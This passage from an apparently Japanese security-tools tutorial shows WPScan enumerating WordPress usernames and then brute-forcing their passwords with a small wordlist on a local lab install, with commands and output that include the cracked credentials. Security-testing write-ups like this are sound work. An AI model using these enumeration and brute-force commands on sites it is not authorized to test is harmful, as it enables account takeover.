| Articles - Tools |
ユーザー名の調査とパスワードクラッキング
次にユーザー名の調査を--enumerateオプションで実行してみる
root@bt:/pentest/web/scanners/wpscan# ./wpscan.rb --url lamp/wordpress-3.2.1/ --enumerate u
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.0
WordPress Security Scanner by ethicalhack3r.co.uk
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
# Copyright (C) 2011 Ryan Dewhurst
# This program comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under certain conditions. See GNU GPLv3.
| URL: http://lamp/wordpress-3.2.1/
| Started on Sat Jul 23 02:03:39 2011
[+] The WordPress theme in use is called twentyeleven
[+] The WordPress http://lamp/wordpress-3.2.1/readme.html file exists.
[+] WordPress version 3.2.1 identified from meta generator.
[+] Enumerating usernames...
We found the following 2 username/s:
admin
TTS
[+] Finished at Sat Jul 23 02:03:45 2011
root@bt:/pentest/web/scanners/wpscan# ユーザー名として、adminとTTSの二人が列挙されているのがわかるだろう。
辞書を利用したパスワードアタックは--wordlistオプション、--threadsオプション、usernameオプションなどを組み合わせて行うことができる。
たとえば、adminというユーザー名を指定、辞書にdic.txtを指定して、アタックを行う場合には、
ruby ./wpscan.rb --url www.example.com –wordlist dic.txt --username admin
という指定をすればよいわけだ。今回は、デキレースではないが、10個の単語を辞書(test.txt)として、その中に該当するパスワードが存在するという状況でテストしている。テストは上記のadmin/TTSの二人のユーザーが存在するWordPress環境である。
root@bt:/pentest/web/scanners/wpscan# ./wpscan.rb --url lamp/wordpress-3.2.1/ --wordlist test.txt
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.0
WordPress Security Scanner by ethicalhack3r.co.uk
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
# Copyright (C) 2011 Ryan Dewhurst
# This program comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under certain conditions. See GNU GPLv3.
| URL: http://lamp/wordpress-3.2.1/
| Started on Sat Jul 23 02:04:31 2011
[+] The WordPress theme in use is called twentyeleven
[+] The WordPress http://lamp/wordpress-3.2.1/readme.html file exists.
[+] WordPress version 3.2.1 identified from meta generator.
[+] Enumerating usernames...
We found the following 2 username/s:
admin
TTS
[+] Starting the password brute forcer
Brute forcing admin with 10 passwods...
Brute forcing TTS with 10 passwods...
SUCCESS! Username:TTS Password:dead
SUCCESS! Username:admin Password:admin
[+] Finished at Sat Jul 23 02:04:51 2011
root@bt:/pentest/web/scanners/wpscan# ユーザー名の列挙に続いて、二人のパスワードがクラックされているのがわかるだろう。パスワードクラックでは、前述したように、スレッドを指定することもできるので、たとえば、50スレッドを指定するのであれば、—threads 50を付加すればよいだけだ。
最後に
WordPressの人気を考えれば、サイト構築に利用しているユーザーは膨大な数であることは言うまでもなく、また、WordPressおよびプラグインの脆弱性、そして脆弱なパスワードによって、それらのサイトがクラックされているケースも膨大な数なのである。本サイトのニュースで紹介しているようなデーターベース漏洩事件でも、WordPressで構築されたサイトが度々登場している。
WPScanは、WordPressのバージョンなどの基本ともいえる事前調査~WordPressおよびプラグインの既知の脆弱性の有無の調査を簡単に行えるツールといえるだろう。